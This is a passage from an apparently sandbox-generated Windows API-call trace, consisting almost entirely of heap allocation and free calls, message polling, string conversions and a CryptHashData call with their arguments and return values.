dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0182.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0182.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0182.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0182.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0182.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0182.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0182.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0182.021] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0182.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0182.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0182.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0182.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0182.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0182.021] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0182.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0182.021] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0182.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0182.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0182.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0182.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0182.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0182.022] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0182.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0182.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0182.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54da8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0182.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0182.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0182.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0182.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0182.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0182.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0182.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0182.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0182.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0182.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0182.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0182.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0182.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0182.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0182.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0182.022] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0182.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0182.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0182.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0182.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0182.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0182.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0182.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0182.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0182.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0182.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0182.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0182.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0182.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0182.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0182.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0182.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0182.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0182.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0182.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0182.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0182.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0182.023] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0182.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0182.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0182.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0182.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0182.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54d38, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0182.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0182.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0182.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0182.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0182.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0182.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0182.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0182.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0182.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0182.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0182.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0182.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0182.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0182.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0182.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0182.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0182.024] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0182.024] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0182.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0182.024] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0182.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0182.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0182.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0182.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0182.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0182.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0182.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0182.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0182.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0182.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0182.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0182.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0182.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0182.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0182.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0182.025] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0182.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50b78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0182.026] CryptHashData (hHash=0xa87690, pbData=0x2e54de8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0182.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0182.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0182.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0182.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0182.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0182.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0182.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0182.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0182.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0182.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0182.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0182.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0182.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0182.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0182.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0182.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0182.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0182.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0182.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0182.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0182.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0182.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0182.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0182.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0182.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0182.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0182.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0182.027] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0182.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0182.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0182.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0182.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0182.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0182.028] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0182.028] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0182.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0182.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0182.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0182.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0182.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0182.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0182.028] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0182.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0182.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509c8 [0182.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0182.028] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0182.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0182.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0182.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0182.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0182.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0182.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0182.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0182.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0182.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0182.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0182.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0182.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0182.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0182.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0182.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0182.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0182.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0182.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0182.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0182.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0182.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0182.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0182.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0182.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0182.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0182.030] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0182.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0182.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0182.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c50 [0182.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0182.030] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0182.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0182.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0182.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0182.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0182.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0182.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0182.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0182.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0182.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0182.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0182.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0182.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0182.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0182.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0182.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0182.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0182.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0182.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0182.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0182.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0182.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0182.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0182.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0182.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0182.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0182.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0182.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0182.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0182.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0182.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0182.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0182.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0182.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0182.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0182.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0182.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0182.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0182.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0182.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0182.031] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0182.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0182.032] 